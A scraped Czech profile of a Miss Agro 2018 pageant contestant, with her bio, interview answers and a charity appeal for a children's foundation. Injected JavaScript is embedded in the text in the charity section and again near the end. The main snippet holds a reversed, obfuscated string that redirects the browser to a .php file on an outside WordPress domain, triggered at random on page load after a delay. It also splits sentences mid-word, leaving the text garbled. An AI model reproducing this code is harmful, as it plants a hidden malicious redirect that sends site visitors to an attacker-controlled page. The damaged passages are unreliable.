Anika Stará

Profil

Fakulta: PEF
Obor: Podnikání a administrativa (PAA)
Ročník: 4.
Věk:
24

Anika je věčně usměvavá a neskutečně ukecaná nezřízená střela, co jde do všeho po hlavě a je za všech okolností sama sebou. Od dětství závodně tančí, má ráda sport, cestování, focení a s oblibou také vystupuje ze své komfortní zóny – protože jak říká – život je potřeba prožívat a vychutnávat.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

Protože jdu často proti proudu a chci ukázat, že i takovej sarkastickej tank jako já může „nosit“ korunku a že missky jsou taky jenom lidi (a klíďo s kejtičkama a špíčkem).

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Když by to šlo, zase bych se chtěla narodit na stejném místě, přijít do stejné rodinky, žít tam, kde žiju teď a ač bych možná jako dítě trochu víc zlobila než byla tak moc vzorná jako dřív, žila bych si tak, jak si žiju, protože i přes všemožný překážky, co život přinese, je to děsně fajn.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Upřímně to pro mě byla záložní i když neméně sympatická volba. A na ČZU zbožňuju kampus a okolí „školy“ – myslím, že to dokáže skvěle zpříjemnit den, uvolnit a nabít – každý si v něm najde to své.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Sama – chtělo to trochu praštěnej nápad, pak myšlenky typu proboha, cos to udělala, sebrání odvahy k doražení na casting a pak už jen bytí sama sebou, kopa srdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andy v rámci teambuildingů a to, že mě tu dneska máte.